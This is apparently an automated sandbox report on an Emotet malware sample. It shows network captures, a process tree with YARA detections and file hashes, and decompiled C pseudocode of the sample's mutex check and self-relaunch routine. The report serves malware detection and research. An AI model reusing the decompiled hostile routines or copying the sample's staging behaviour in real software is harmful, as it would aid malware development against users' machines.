e4 b8 a9 d0 14 cd aa 9a c7 8f 0d 1a 7e e0 0f 48 07 19 53 9a 0c 7e 0e 42 ab 2f f6 d0 6c ff 07 cc 87 bb d6 66 33 78 7e 09 54 cb 81 ab 18 22 d2 cd a9 c9 92 d2 43 2c a0 83 09 68 f8 55 d3 e1 0e 97 05 ea 28 8d b8 56 f8 c4 91 13 3a 99 f0 fc 67 99 ca 7c 5e 1f c8 7e b1 ac bd cb 80 69 42 d4 f4 c2 cf ed 15 66 ba 9d 5a e0 b8 eb fc 99 f2 15 8e f2 5b 66 fd 0e 37 6d 6b c5 65 6d f6 7c c3 d3 1f 9a 53 d5 69 8a 69 db b4 a5 77 b9 27 7c a6 e9 8e 4e aa 33 6b d9 9b ab 10 f6 10 39 67 ab 8e 59 4e 6e f4 c1 fd c3 88 be fb 83 bf 44 14 f0 e0 2e 71 58 bb 8e 29 0c 57 34 c2 c2 f0 71 3b 26 df 3a d3 4a a8 7c da b4 c6 69 91 bb c6 4a b1 3b da 3b 24 31 a2 bb ce 00 16 68 10 45 e1 2b 5c 9b e9 96 c3 b3 8d 3f f7 f1 c0 34 Data Ascii: =I!kgEe8='cPmPLuc5s^Tt6O({iUHv=k*U:\]8E-sR,oQ+QpgOX%>KFR$~HS~B/lf3x~T"C,hU(V:g\|^~iBfZ[f7mkem\|Siiw'\|N3k9gYNnD.qX)W4q;&:J\|iJ;;$1hE+\?4
Apr 14, 2021 11:43:07.893347979 CEST	969	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Apr 2021 09:43:07 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: vEjGZyD0iN.exe PID: 5832 Parent PID: 5604

General

Start time:	11:42:58
Start date:	14/04/2021
Path:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vEjGZyD0iN.exe'
Imagebase:	0x13e0000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.196126268.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vEjGZyD0iN.exe PID: 5720 Parent PID: 5832

General

Start time:	11:42:58
Start date:	14/04/2021
Path:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\vEjGZyD0iN.exe
Imagebase:	0x13e0000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.197038659.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.204289645.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6028 Parent PID: 568

General

Start time:	11:43:00
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: appsys.exe PID: 4716 Parent PID: 568

General

Start time:	11:43:01
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\appsys.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\appsys.exe
Imagebase:	0x13e0000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000000.202803332.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.203947277.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: appsys.exe PID: 1020 Parent PID: 4716

General

Start time:	11:43:01
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\appsys.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\appsys.exe
Imagebase:	0x13e0000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000000.203553485.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.464331526.00000000013E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5492 Parent PID: 568

General

Start time:	11:43:27
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2436 Parent PID: 568

General

Start time:	11:43:27
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6404 Parent PID: 568

General

Start time:	11:43:38
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6464 Parent PID: 568

General

Start time:	11:43:39
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6472 Parent PID: 568

General

Start time:	11:43:39
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6556 Parent PID: 568

General

Start time:	11:43:40
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6640 Parent PID: 568

General

Start time:	11:43:40
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 6696 Parent PID: 568

General

Start time:	11:43:41
Start date:	14/04/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7b8520000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6732 Parent PID: 568

General

Start time:	11:43:41
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6784 Parent PID: 568

General

Start time:	11:43:42
Start date:	14/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 5384 Parent PID: 6732

General

Start time:	11:44:42
Start date:	14/04/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff7302e0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3596 Parent PID: 5384

General

Start time:	11:44:42
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vEjGZyD0iN.exe PID: 5832 Parent PID: 5604 vEjGZyD0iN.exeCOMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	531
Total number of Limit Nodes:	3

Executed Functions

Function 013E15B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E013E15B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E013E19E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E013E1830(0x13e1004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0x13ec200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E013E1830(0x13e1000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0x13ec200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E013E9C50(0x13e1000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x013e15c9
0x013e15cf
0x013e15d5
0x013e15d9
0x013e15df
0x013e15ef
0x013e15f4
0x013e1602
0x013e1615
0x013e162e
0x013e1633
0x013e1641
0x013e1654
0x013e166d
0x013e1671
0x013e1692
0x013e1698
0x013e1673
0x013e167e
0x013e1684
0x013e1688
0x013e16a4
0x013e16d3
0x013e16dc
0x013e16e6
0x013e1707
0x013e170f
0x00000000
0x013e1711
0x013e1714
0x013e171d
0x013e1726
0x013e172d
0x013e1734
0x013e1744
0x013e1744
0x013e16a6
0x013e16a7
0x013e16ae
0x013e16b5
0x013e16bb
0x013e16ca
0x013e16ca
0x013e168a
0x013e168b
0x00000000
0x013e168b
0x013e1688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013E15C9

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

_snwprintf.NTDLL ref: 013E1602
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E160E
HeapFree.KERNEL32(00000000), ref: 013E1615
_snwprintf.NTDLL ref: 013E1641
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E164D
HeapFree.KERNEL32(00000000), ref: 013E1654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 013E1667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 013E167E
CloseHandle.KERNEL32(00000000), ref: 013E168B
GetLastError.KERNEL32 ref: 013E1699
SetEvent.KERNEL32(00000000), ref: 013E16A7
CloseHandle.KERNEL32(00000000), ref: 013E16AE
CloseHandle.KERNEL32(00000000), ref: 013E16B5
memset.NTDLL ref: 013E16D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 013E1707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 013E1714
CloseHandle.KERNEL32(?), ref: 013E171D
CloseHandle.KERNEL32(?), ref: 013E1726
CloseHandle.KERNEL32(00000000), ref: 013E172D
CloseHandle.KERNEL32(00000000), ref: 013E1734

Strings

D, xrefs: 013E16DC

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: D
API String ID: 2830143876-2746444292
Opcode ID: 0ca21bdd75b38fbde8f44a1a7c6184569d42e5d079337873d162cfb9d250d30a
Instruction ID: 21f54555093496b1b14ac7563d4e15732b6edae57ef7f46c0cece1b2661bef34
Opcode Fuzzy Hash: 0ca21bdd75b38fbde8f44a1a7c6184569d42e5d079337873d162cfb9d250d30a
Instruction Fuzzy Hash: 0E417D71900319ABEB30ABA4DC0DFEE7BBCEB44316F040055FA19EA1C4DB749A448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 013E1599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E013E1599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E013E19E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E013E1830(0x13e1004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0x13ec200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E013E1830(0x13e1000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0x13ec200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E013E9C50(0x13e1000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x013e1599
0x013e159d
0x013e15a5
0x013e15a6
0x013e15a9
0x013e15c9
0x013e15cf
0x013e15d5
0x013e15d9
0x013e15df
0x013e15ef
0x013e15f4
0x013e1602
0x013e1615
0x013e162e
0x013e1633
0x013e1641
0x013e1654
0x013e166d
0x013e1671
0x013e1691
0x013e1698
0x013e1673
0x013e167e
0x013e1684
0x013e1688
0x013e16a4
0x013e16d3
0x013e16dc
0x013e16e6
0x013e1707
0x013e170f
0x00000000
0x013e1711
0x013e1714
0x013e171d
0x013e1726
0x013e172d
0x013e1734
0x013e1744
0x013e1744
0x013e16a6
0x013e16a7
0x013e16ae
0x013e16b5
0x013e16bb
0x013e16ca
0x013e16ca
0x013e168a
0x013e168b
0x00000000
0x013e168b
0x013e1688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013E15C9

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

_snwprintf.NTDLL ref: 013E1602
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E160E
HeapFree.KERNEL32(00000000), ref: 013E1615
_snwprintf.NTDLL ref: 013E1641
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E164D
HeapFree.KERNEL32(00000000), ref: 013E1654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 013E1667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 013E167E
CloseHandle.KERNEL32(00000000), ref: 013E168B
GetLastError.KERNEL32 ref: 013E1699
SetEvent.KERNEL32(00000000), ref: 013E16A7
CloseHandle.KERNEL32(00000000), ref: 013E16AE
CloseHandle.KERNEL32(00000000), ref: 013E16B5

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: f376e25d07ac38de42f6e74a81a1fa76272f9c08371e17365994c7e12ded915d
Instruction ID: d27d2564dd257c535c2b4727317870e8f152f9ce567e30d8180ffba977f28171
Opcode Fuzzy Hash: f376e25d07ac38de42f6e74a81a1fa76272f9c08371e17365994c7e12ded915d
Instruction Fuzzy Hash: 6D21A671640355BFEB309BA4CC0EFDE7BBDEB44716F044091FA09EA1C4DA309A458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 013E1575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E013E1575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E013E1830(0x13e1004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0x13ec200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E013E1830(0x13e1000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0x13ec200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E013E9C50(0x13e1000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x013e1575
0x013e1575
0x013e1575
0x013e1575
0x013e1575
0x013e157b
0x013e157e
0x013e1580
0x013e1585
0x00000000
0x00000000
0x013e1587
0x013e1587
0x013e158a
0x013e158c
0x013e158f
0x013e1591
0x013e1592
0x013e1593
0x013e1594
0x013e1594
0x013e1594
0x013e15d9
0x013e15d9
0x013e15df
0x013e15ef
0x013e15f4
0x013e1602
0x013e1615
0x013e162e
0x013e1633
0x013e1641
0x013e1654
0x013e166d
0x013e1671
0x013e1691
0x013e1698
0x013e1673
0x013e167e
0x013e1684
0x013e1688
0x013e16a4
0x013e16d3
0x013e16dc
0x013e16e6
0x013e1707
0x013e170f
0x00000000
0x013e1711
0x013e1714
0x013e171d
0x013e1726
0x013e172d
0x013e1734
0x013e1744
0x013e1744
0x013e16a6
0x013e16a7
0x013e16ae
0x013e16b5
0x013e16bb
0x013e16ca
0x013e16ca
0x013e168a
0x013e168b
0x00000000
0x013e168b
0x013e1688

APIs

_snwprintf.NTDLL ref: 013E1602
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E160E
HeapFree.KERNEL32(00000000), ref: 013E1615
_snwprintf.NTDLL ref: 013E1641
GetProcessHeap.KERNEL32(00000000,013E9F6B), ref: 013E164D
HeapFree.KERNEL32(00000000), ref: 013E1654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 013E1667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 013E167E
CloseHandle.KERNEL32(00000000), ref: 013E168B

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: d14873079b3de8e38d15de762986f496df5531c4e30a540330b0d907572d2078
Instruction ID: 8191b7d593cca3ae89bcea8853277cb9594fc4f50b2cff48dac597df1750e4a8
